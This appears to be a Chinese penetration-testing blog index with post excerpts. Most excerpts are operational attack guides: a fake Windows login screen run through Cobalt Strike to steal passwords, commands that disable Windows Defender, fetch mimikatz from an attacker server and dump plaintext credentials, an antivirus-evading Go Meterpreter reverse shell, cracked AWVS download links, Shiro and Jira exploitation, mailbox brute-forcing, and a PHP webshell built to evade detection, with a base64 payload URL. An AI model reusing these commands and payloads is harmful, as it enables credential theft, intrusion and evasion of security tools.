伪造windows登录屏幕窃取密码之FakeLogonScreen

在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。

简介

FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。

另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。

这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。

运行环境

由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。

利用

可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:

阅读全文 »

Windows Server 2016抓取明文密码

临时禁止Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force

下载mimikatz后解压缩。

powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注册表开启UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用户下次再登录的时候,可抓到明文密码

mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit

Golang实现的x86下的Meterpreter reverse tcp

Golang实现的x86下的Meterpreter reverse tcp。地址:https://github.com/insightglacier/go_meterpreter

做静态免杀实验,代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386
go build -ldflags="-H windowsgui -w"   

注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。

由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址:https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection

在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。

阅读全文 »

Acunetix Web Vulnerability Scanner(AWVS) 13 破解版

今天看到有群里分享Acunetix Web Vulnerability Scanner(AWVS)13的破解版本,这里分享一下~

Windows下载地址:
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ

Linux 下载地址:
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g

官网介绍地址
https://www.acunetix.com/vulnerability-scanner/

注:工具来源于网络,请自行验证是否存在后门等情况,为了安全考虑建议使用虚拟机运行。

Apache Shiro 反序列化漏洞利用工具使用

Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。

工具下载地址:Shiro_Exploit

该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。

环境

Python2.7

requests

Jdk 1.8

使用说明

usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]

OPTIONS:
-h, --help            show this help message and exit
-u URL, --url URL     Target url.
-t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
                        gadget
-p PARAMS, --params PARAMS
                        gadget params
-k KEY, --key KEY     CipherKey

Example: python shiro_exploit.py -u target

检测默认只需要使用-u参数即可。

检测可用gadget的方式可以运行

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。

阅读全文 »

CVE-2019-8449 Jira 枚举用户漏洞的利用

一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。

首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。

2020年2月3日在exploit-db上公布了该漏洞利用脚本。地址:
Jira 8.3.4 - Information Disclosure (Username Enumeration)

其漏洞很简单,只需要访问 http://target/rest/api/latest/groupuserpicker?query=admin (target为目标jira系统地址)。如果返回的是json字符串就说明存在漏洞。如果返回"You are not authenticated. Authentication required to perform this operation." 则说明不存在这个漏洞。

那漏洞应该如何利用呢?
1、通过字典方式,探测用户是否存在。
2、如果存在漏洞,那么一旦匹配到结果,则会返回json格式的字符串,其中包含来用户民、邮箱、和显示的名字信息。在实际测试中发现,请求的参数不一定是用户的全拼,例如我们输入c,也是可以返回相关结果的。我们可以改变query参数的值,从a至z遍历。这样就可以获取系统中的用户名列表。

通过以上获取信息后,可以进行后续的利用。比如爆破用户密码,邮箱密码,发送钓鱼邮件等等。具体根据实际场景和相关经验进行扩展。

相关连接

  1. Jira 8.3.4 - Information Disclosure (Username Enumeration)

  2. More Jira Enumeration (usernames) – CVE-2019-8449

  3. User enumeration through the groupuserpicker api resource - CVE-2019-8449

企业邮箱爆破脚本

IMAP(Internet Mail Access Protocol)以前称作交互邮件访问协议(Interactive Mail Access Protocol),是一个应用层协议。IMAP是斯坦福大学在1986年开发的一种邮件获取协议。它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。当前的权威定义是RFC3501。IMAP协议运行在TCP/IP协议之上,使用的端口是143。它与POP3协议的主要区别是用户可以不用把所有的邮件全部下载,可以通过客户端直接对服务器上的邮件进行操作。----来源于百度百科

目前知名企业邮箱(如腾讯企业邮箱)均支持该协议,许多人喜欢用邮件客户端或者手机收发邮件,则大多数会选择开启该服务。在大多数情况下适用。(文末有脚本下载地址)。

该脚本使用Python开发,2和3版本均可运行。

阅读全文 »

青藤云Webshell查杀绕过

上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。
首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话后门代码。

记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:

阅读全文 »

最新绕过D盾的php Webshell

去年分析D盾的查杀规律弄的绕过。
查杀效果:

具体请看代码:

<?php
function cc(){
    global $b;
    $a =$_GET[$b];  //此处可改成POST方式
    $str =$a;
    return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;

include($aa);

传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。

阅读全文 »

Python2与Python3差异之print

时代在发展,技术在进步。没有什么是停止不前的!2019年已经接近尾声,Python2停止更新的时间越来越近。其中比较流行的如 NumPy、Requests 和 TensorFlow 等承诺到 2020 年将停止支持2.x。尽管迁移过程也会花许多时间与精力,但是转Python3是早晚都要面对的。最近在迁移自己的代码到Python3,对于迁移的过程中遇到的情况进行总结。

首先我们来说一下常用的print。
最明显的区别就在于,我们在2.x版本中的print "hello world" ,在3.x版本中会报错。必须要以print("hello world")这样的格式。为什么会发生这样的变化呢?下面就让我们来看一下~

阅读全文 »